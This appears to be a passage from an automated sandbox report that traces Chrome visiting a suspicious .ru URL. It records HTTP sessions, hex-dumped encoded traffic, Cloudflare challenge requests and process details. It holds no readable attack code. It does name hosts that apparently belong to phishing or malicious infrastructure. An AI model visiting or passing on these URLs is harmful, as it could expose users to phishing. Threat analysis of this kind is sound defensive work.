                                                      2025-01-14 15:11:39 UTC16384OUTData Raw: 57 35 74 41 39 53 35 45 7a 55 74 4a 6b 58 6b 24 6c 55 38 58 50 30 50 2b 6a 76 61 76 61 2b 7a 24 41 75 77 49 57 7a 75 7a 7a 61 7a 4d 7a 6d 7a 7a 5a 77 48 6b 66 77 4f 45 49 4c 73 50 41 7a 50 7a 4a 77 73 7a 75 35 49 65 7a 6c 36 4c 70 49 39 7a 69 2b 7a 69 55 37 7a 55 2b 24 76 7a 2b 7a 5a 34 4f 6b 7a 63 7a 6a 2b 4c 35 7a 31 7a 69 41 4f 4d 7a 6d 7a 6f 7a 4c 4d 7a 4f 30 37 70 57 4d 49 41 7a 31 77 49 2b 77 41 7a 35 41 71 6c 55 78 7a 6f 62 75 36 39 66 7a 69 7a 57 6b 7a 41 7a 75 4f 24 30 77 61 70 42 2b 4f 61 49 53 44 35 2b 75 5a 4f 39 77 63 77 6f 45 52 59 7a 75 4f 7a 69 49 6c 7a 39 77 69 70 7a 6e 7a 66 2b 59 5a 4f 6e 7a 5a 77 75 69 77 39 7a 64 41 4f 58 24 30 7a 35 2b 57 6b 7a 67 69 69 7a 71 35 49 62 7a 47 7a 57 7a 4f 57 41 42 41 4c 77 7a 58 7a 59 7a 7a 41 7a 50 7a
                                                      Data Ascii: W5tA9S5EzUtJkXk$lU8XP0P+jvava+z$AuwIWzuzzazMzmzzZwHkfwOEILsPAzPzJwszu5Iezl6LpI9zi+ziU7zU+$vz+zZ4Okzczj+L5z1ziAOMzmzozLMzO07pWMIAz1wI+wAz5AqlUxzobu69fzizWkzAzuO$0wapB+OaISD5+uZO9wcwoERYzuOziIlz9wipznzf+YZOnzZwuiw9zdAOX$0z5+Wkzgiizq5IbzGzWzOWABALwzXzYzzAzPz
                                                      2025-01-14 15:11:39 UTC1733OUTData Raw: 34 53 31 31 4a 77 49 2b 57 70 49 53 31 51 68 55 78 7a 6a 77 64 41 75 35 49 42 31 4d 70 75 54 6e 66 7a 36 2b 7a 50 4a 73 7a 5a 39 59 4b 6f 6e 7a 69 71 57 5a 7a 31 7a 59 2b 57 2d 4f 65 70 2b 4f 64 58 49 61 7a 6f 72 4d 45 6d 66 7a 76 58 4f 69 49 61 7a 72 66 57 66 2b 30 48 78 4d 53 37 7a 74 61 31 77 57 6f 4b 36 5a 32 65 4b 35 49 54 72 47 66 4e 70 7a 31 7a 4c 4d 69 68 6f 6c 7a 6d 70 43 35 49 4b 7a 7a 4f 35 4f 30 67 7a 55 36 70 51 49 5a 36 75 69 35 34 42 66 7a 6d 54 2d 4f 6e 47 41 67 68 62 6c 4c 7a 41 79 53 76 4b 7a 39 4a 4d 6a 38 45 49 59 7a 69 36 67 2b 49 78 7a 33 70 7a 47 61 4e 41 6d 7a 57 48 51 4b 63 61 45 71 41 49 68 6f 79 6d 65 48 6d 35 7a 39 41 57 4d 49 61 77 46 2b 7a 36 53 76 42 39 43 51 4c 6a 58 5a 58 4c 6f 61 46 6d 41 38 5a 49 4a 7a 4c 7a 55 61 47 77
                                                      Data Ascii: 4S11JwI+WpIS1QhUxzjwdAu5IB1MpuTnfz6+zPJszZ9YKonziqWZz1zY+W-Oep+OdXIazorMEmfzvXOiIazrfWf+0HxMS7zta1wWoK6Z2eK5ITrGfNpz1zLMiholzmpC5IKzzO5O0gzU6pQIZ6ui54BfzmT-OnGAghblLzAySvKz9JMj8EIYzi6g+Ixz3pzGaNAmzWHQKcaEqAIhoymeHm5z9AWMIawF+z6SvB9CQLjXZXLoaFmA8ZIJzLzUaGw
                                                      2025-01-14 15:11:39 UTC1347INHTTP/1.1 200 OK
                                                      Date: Tue, 14 Jan 2025 15:11:39 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Content-Length: 4624
                                                      Connection: close
                                                      cf-chl-out: 0v0jWBO8YFDeBk1FCAd8QhqbZppEcMhNK2X6c1xqSytX3p9HZl6W6bJNCGs2uPNYVHqqRbiTrrkd49FuPMfpvs6SRQWR8V93yqPs5fMOSU0=$EOG+2IsW0/Hugr9QknUxew==
                                                      cf-chl-out-s: pdaDyaejM/sEKMOUUfh9jszZKX+ExCD2Z3nir/yhoWVr/uooQgib++yQ6ltHWzV7ZNekQuAlqj84+O9SPPiyuGFFVpHKtwZqfHW+/5Qg7vrJgWOfIS5UrpnYK9M+iCF9Frs4gEcFjZxAY3ZM7BNyUXeo4azgEiCBUYYBPY4xlW8+Be7MNnUwhb3/3Hxa6Cnn3kPz2eHb3VtlPZ3FYZTKZ6hCDFkdRit03+jq54waPKWQlSshCTYDjmVeB47qP1DQSFQA5gnwpz97qpCX2NJ/kG6/DO7zOp1g0unNsVxyLCPoqXLie3WrPplNAAqsbkHR89xCn625v1VdbQrPWKm5vOI1LXnlQAbzrKSFmep/YBnX/lqQAmHv1ejlFTlxftKXuR3iAPOTSA9G7JqRjtkdxBqfvtRLkB29bMAa30n9GGHbh9tHWplSIvr/nCvWovEsSuKvcBMJarbpoHGdz+7cMJ8CNCCrDsGwrdVBDmKQP4x/OrwJOOy4T4hpkvUZ5zQJK3rtkBA4ovVXb3TYtudiqGBggBmFigG2n6DHEguBfw8NsOTJv7I5IyGl0NlgfOAJrGwsyvnwPQN4eeFbKvcC05w44oEDtSnovON+shq5B//SSrMX8DIa196brdApggyTxkVZdxKWQsr3W/oq8IGqfrbYS4D13vkIDAvmqmWJHhjrmoexQr410w5TtzUOObcEjaLfq7dIw1ExMf9pIOz/W36BQotSfiEh/JwA1cVGOzbCiL8fh64oExmUCGVAcp7qhinSuaWTGxj5is2D0+CMGSkgBtH1lAJk5nXENPNXUozBldkP27OEhN4B4plEBwF/hLS3OittTESa7P4cyANvtnZ0m9Jw7NjZpWeD9SH5SO7YXpc1KlLGavBDg9mZXNCZHd1JRlns/C3uJOBwL1O79cEYqqi14HtczYc6yDwEXIjt++dUfs9onXqUF6bftAZP4VVee4dgZq9Xh2Pt48tHQpfrpYtGXpAnK92wdivnVLs=$sUcHz [TRUNCATED]
                                                      Server: cloudflare
                                                      2025-01-14 15:11:39 UTC62INData Raw: 43 46 2d 52 41 59 3a 20 39 30 31 65 38 66 35 31 32 62 62 30 37 38 64 63 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                      Data Ascii: CF-RAY: 901e8f512bb078dc-EWRalt-svc: h3=":443"; ma=86400
                                                      2025-01-14 15:11:39 UTC1329INData Raw: 59 35 65 58 61 5a 56 6e 65 71 42 7a 62 49 4b 65 64 58 39 59 65 59 47 5a 71 71 4f 6f 61 70 35 70 71 59 4f 61 73 4b 53 52 6c 72 47 35 6f 5a 57 58 74 33 79 58 73 62 6c 38 73 5a 47 61 72 6e 2b 44 77 35 79 44 68 38 62 46 69 34 2f 4a 75 63 72 48 7a 5a 44 42 70 61 37 52 75 4e 7a 58 31 72 79 5a 31 39 79 34 6e 4e 32 67 78 37 57 37 70 74 4c 6d 35 74 62 61 36 65 6d 73 7a 38 48 48 78 2b 72 79 37 37 62 71 74 2f 65 36 73 4d 76 5a 38 76 4c 36 41 4d 4c 76 31 51 50 47 76 4d 55 47 39 66 6f 45 43 73 7a 6e 34 65 72 39 44 78 4d 52 41 67 54 79 47 4e 6f 54 46 78 33 66 41 64 30 65 34 50 66 31 2b 2b 66 34 35 4f 58 73 36 69 54 74 49 69 6b 6e 4c 41 72 6f 49 66 63 32 2b 54 6b 55 2b 76 62 33 45 79 4d 31 2b 78 6b 53 47 76 6c 44 51 67 4a 47 52 69 4a 4e 4c 51 73 68 45 77 70 44 4e 44 45
                                                      Data Ascii: Y5eXaZVneqBzbIKedX9YeYGZqqOoap5pqYOasKSRlrG5oZWXt3yXsbl8sZGarn+Dw5yDh8bFi4/JucrHzZDBpa7RuNzX1ryZ19y4nN2gx7W7ptLm5tba6emsz8HHx+ry77bqt/e6sMvZ8vL6AMLv1QPGvMUG9foECszn4er9DxMRAgTyGNoTFx3fAd0e4Pf1++f45OXs6iTtIiknLAroIfc2+TkU+vb3EyM1+xkSGvlDQgJGRiJNLQshEwpDNDE
                                                      2025-01-14 15:11:39 UTC1369INData Raw: 58 46 42 65 55 42 31 65 46 64 55 59 59 42 73 58 59 70 65 58 6b 79 4e 66 30 39 55 6b 31 43 4f 61 6f 6c 71 63 6c 74 54 61 56 70 53 55 35 42 76 62 35 52 31 6c 58 4b 57 68 71 42 73 71 34 47 70 65 59 68 2b 68 59 47 79 69 6f 35 31 74 62 53 57 69 4c 6c 31 75 49 71 59 6a 62 56 36 6e 62 65 31 68 63 57 70 78 6f 65 6b 68 61 4f 51 7a 36 61 6b 6f 4b 79 79 71 61 72 56 6d 62 65 62 32 74 6a 53 6f 4a 50 62 34 62 66 6b 7a 36 57 78 77 73 58 6f 74 38 66 43 7a 72 75 37 37 4d 6e 42 34 62 58 50 79 61 2f 56 36 62 66 36 32 66 66 4f 73 39 33 30 77 39 7a 65 35 73 4d 48 35 51 76 4c 34 77 67 4f 30 4d 4d 4e 35 4e 77 56 41 51 37 4b 38 2f 4c 78 36 42 30 55 47 50 49 50 39 52 2f 78 45 2f 49 42 35 53 59 5a 41 66 30 47 4c 51 50 73 35 77 38 46 42 79 55 4f 4e 77 73 6f 4d 50 6e 35 4f 67 63 65
                                                      Data Ascii: XFBeUB1eFdUYYBsXYpeXkyNf09Uk1COaolqcltTaVpSU5Bvb5R1lXKWhqBsq4GpeYh+hYGyio51tbSWiLl1uIqYjbV6nbe1hcWpxoekhaOQz6akoKyyqarVmbeb2tjSoJPb4bfkz6WxwsXot8fCzru77MnB4bXPya/V6bf62ffOs930w9ze5sMH5QvL4wgO0MMN5NwVAQ7K8/Lx6B0UGPIP9R/xE/IB5SYZAf0GLQPs5w8FByUONwsoMPn5Ogce
                                                      2025-01-14 15:11:39 UTC1369INData Raw: 75 49 63 59 4f 4d 58 6c 2b 49 54 33 2b 47 62 55 39 54 6b 56 47 41 56 5a 5a 75 61 46 74 54 68 31 64 67 55 34 4a 2b 5a 4a 32 65 6e 32 65 70 66 49 6d 59 5a 36 56 75 66 58 2b 43 70 6f 2b 4b 6b 59 5a 77 6a 58 43 49 76 59 56 34 6e 4c 69 62 75 4b 2b 54 6b 4c 69 79 6d 5a 53 6d 76 5a 66 4a 79 37 6d 63 6a 4b 75 64 77 37 47 6a 31 4b 71 7a 6b 4a 53 73 70 36 71 33 71 63 2b 2b 74 72 44 6b 77 64 36 6c 35 73 72 44 70 37 65 35 70 71 7a 65 73 4b 71 78 76 39 2b 77 78 66 66 52 73 71 37 72 78 74 44 49 74 2b 4c 55 31 67 54 42 2f 64 76 66 34 63 4c 61 2b 2b 59 4b 32 4f 6a 6c 44 39 54 75 41 51 72 69 47 75 49 4c 37 68 6f 55 30 65 41 67 48 52 6e 74 49 76 49 49 38 53 67 6f 4b 65 67 63 2f 53 4c 35 4d 50 44 6c 42 2b 73 6b 38 67 73 54 44 6a 33 35 50 53 67 78 45 68 73 54 49 41 42 45 46
                                                      Data Ascii: uIcYOMXl+IT3+GbU9TkVGAVZZuaFtTh1dgU4J+ZJ2en2epfImYZ6VufX+Cpo+KkYZwjXCIvYV4nLibuK+TkLiymZSmvZfJy7mcjKudw7Gj1KqzkJSsp6q3qc++trDkwd6l5srDp7e5pqzesKqxv9+wxffRsq7rxtDIt+LU1gTB/dvf4cLa++YK2OjlD9TuAQriGuIL7hoU0eAgHRntIvII8SgoKegc/SL5MPDlB+sk8gsTDj35PSgxEhsTIABEF
                                                      2025-01-14 15:11:39 UTC557INData Raw: 46 57 31 6d 51 63 5a 42 68 62 47 61 41 56 6b 39 35 69 56 78 32 69 48 68 73 61 57 46 7a 62 33 39 79 67 58 53 44 67 6e 5a 35 72 48 32 74 66 6e 6c 78 68 6e 4b 4f 6a 71 35 30 6b 70 71 50 65 49 65 30 73 34 75 77 6f 70 53 41 77 72 79 68 6b 73 6e 49 77 35 6a 4c 77 4a 2b 50 70 38 53 71 6e 39 4b 2f 6a 71 4b 50 71 71 36 63 73 35 7a 4f 72 5a 65 36 31 72 58 69 73 75 47 78 77 63 4c 54 75 4f 33 4b 75 36 79 6a 32 2b 65 7a 70 39 57 79 78 71 76 61 79 38 2b 7a 31 62 72 4d 41 41 54 79 78 4e 2f 34 37 39 50 6a 2b 4f 6e 57 35 76 63 43 34 73 4d 4e 33 39 51 43 38 76 62 6b 42 76 6f 5a 37 65 63 4d 32 64 4c 34 45 52 50 31 37 78 45 64 32 68 6f 6c 49 74 37 33 4a 53 66 77 43 53 44 78 42 6a 59 70 4c 67 6f 36 4a 50 67 50 4c 6a 6b 79 38 6b 49 78 4f 78 59 32 45 7a 2f 36 46 45 45 2f 44 52
                                                      Data Ascii: FW1mQcZBhbGaAVk95iVx2iHhsaWFzb39ygXSDgnZ5rH2tfnlxhnKOjq50kpqPeIe0s4uwopSAwryhksnIw5jLwJ+Pp8Sqn9K/jqKPqq6cs5zOrZe61rXisuGxwcLTuO3Ku6yj2+ezp9Wyxqvay8+z1brMAATyxN/479Pj+OnW5vcC4sMN39QC8vbkBvoZ7ecM2dL4ERP17xEd2holIt73JSfwCSDxBjYpLgo6JPgPLjky8kIxOxY2Ez/6FEE/DR


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      24192.168.2.749747104.21.42.2084433232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-14 15:11:40 UTC672OUTGET /zsTJyqSCknJosAIyosVtewsSHSVmVVNLKRTMTTWQLLZIYRKPFDIHEYUXSUGIYXFYQUPUQZ HTTP/1.1
                                                      Host: aywreru71bxriulr9w5xt2j5yyfcmh7nad9q469mzz3lbp4cdrovxgyj.ivertoneym.ru
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://2ol.itectaxice.ru
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://2ol.itectaxice.ru/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-14 15:11:40 UTC900INHTTP/1.1 200 OK
                                                      Date: Tue, 14 Jan 2025 15:11:40 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Access-Control-Allow-Origin: *
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tg9b%2B%2FscY0YC2KZAAwP3RH3krJuwhp8%2BCnG12RdQOzX4jaZd6tChqWB1rfgzZl8MevT3%2B6ibIggMoHMGND%2B5%2BR48LIXMsi9WZomSq0Plh%2FmHuRuc6dGhBFySWz0B4BlDls7sB7Yhhu74yG%2BDI2rt0PMsFSqo6CYrQdsLEO2ywDGFWiESx4hOw5fbQeaH6TeRLwXSxmzqBsq6"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 901e8f561be942a9-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1585&rtt_var=598&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1250&delivery_rate=1825000&cwnd=107&unsent_bytes=0&cid=f4df92b1b70b3929&ts=559&x=0"
                                                      2025-01-14 15:11:40 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                      Data Ascii: 11
                                                      2025-01-14 15:11:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      25192.168.2.749750172.67.166.744433232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-14 15:11:41 UTC464OUTGET /zsTJyqSCknJosAIyosVtewsSHSVmVVNLKRTMTTWQLLZIYRKPFDIHEYUXSUGIYXFYQUPUQZ HTTP/1.1
                                                      Host: aywreru71bxriulr9w5xt2j5yyfcmh7nad9q469mzz3lbp4cdrovxgyj.ivertoneym.ru
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-14 15:11:42 UTC896INHTTP/1.1 200 OK
                                                      Date: Tue, 14 Jan 2025 15:11:42 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Access-Control-Allow-Origin: *
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ORg4k%2FH2LhRqplLXQYooXC7cYydzSjUydY38FD3ATTqSsIu34u1VcbN8gN7j1C0ORu8LRcsFi2Sgzl61AxzsdG5nVxe%2FlJ6qzP%2BewTlntQ5HL%2BUoB%2FWjMpKJW51VRBpcyh%2BQXpyJLfZzFj6D1uhSjr2tEU3JwDVn8YyMfKlUPD22kqOwJirOmdONF6CerhyFdggT8mjtZ4cg"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 901e8f5ce8fc7d08-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1820&min_rtt=1817&rtt_var=688&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1042&delivery_rate=1581798&cwnd=177&unsent_bytes=0&cid=c36466e23a284105&ts=620&x=0"
                                                      2025-01-14 15:11:42 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                      Data Ascii: 11
                                                      2025-01-14 15:11:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      26192.168.2.749746104.18.94.414433232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-14 15:11:43 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1388961222:1736863973:GZGEH0pIw0BU0Gk3FFCEuy8by8CZFsaUV52txd7bA3s/901e8eeb3e1dc337/UKdFAV8735A.fnyP9jwvLCzYUUCicqviSOTpl0y47QA-1736867483-1.1.1.1-s2.BR4GeipckaJLuZ.uJDVn2lHya14qp0yokk3FDojg3VhgSENeOY1eLHm9OzyAN HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-14 15:11:44 UTC442INHTTP/1.1 400 Bad Request
                                                      Date: Tue, 14 Jan 2025 15:11:43 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 14
                                                      Connection: close
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      cf-chl-out: sdoJXgWL3hWd+y9HYGX2kxVixCnSGoQb4NKo6ahNWbqugT5sE2XcTq2CqkD+1cRrV3ZKjFORH+wg1D8pTcZbmQ==$7W6bM0sroXuZZ6XWmPHIlw==
                                                      Server: cloudflare
                                                      CF-RAY: 901e8f6b9e76c347-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2025-01-14 15:11:44 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                      Data Ascii: {"err":100230}


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:10:11:09
                                                      Start date:14/01/2025
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                      Imagebase:0x7ff6c4390000
                                                      File size:3'242'272 bytes
                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:2
                                                      Start time:10:11:12
                                                      Start date:14/01/2025
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1908,i,5728571239909493604,3707031893138977265,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                      Imagebase:0x7ff6c4390000
                                                      File size:3'242'272 bytes
                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:3
                                                      Start time:10:11:18
                                                      Start date:14/01/2025
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://2ol.itectaxice.ru/Qm75/"
                                                      Imagebase:0x7ff6c4390000
                                                      File size:3'242'272 bytes
                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      No disassembly